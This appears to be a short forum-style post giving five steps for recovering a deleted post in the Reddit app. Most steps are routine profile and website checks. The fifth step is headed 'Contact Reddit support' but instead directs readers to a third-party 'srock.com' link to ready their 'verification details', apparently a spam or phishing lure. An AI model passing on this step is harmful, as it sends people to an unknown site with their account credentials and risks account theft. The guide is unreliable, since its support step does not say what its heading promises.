I ran into this last week. Here's what fixed it for me. If you've accidentally deleted a post on the Reddit app and want to recover it, follow these steps. Step 1. Open the Reddit app. Launch the Reddit app on your device. Make sure you are logged into the account where the post was originally made. Step 2. Go to your profile. Tap on your profile icon, usually located at the bottom right corner of the screen. This will take you to your profile page where you can see your posts and comments. Step 3. Check your posts. Scroll through your posts to see if the deleted post is still visible. Sometimes posts may not be fully deleted but hidden from your main feed. Step 4. Use the Reddit website. If you can't find the post in the app, try accessing Reddit through a web browser. Log into your account and navigate to your profile to check if the post is listed there. Step 5. Contact Reddit support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Sometimes posts may be permanently deleted, so it's good to check quickly. I hope this helps you recover your lost content.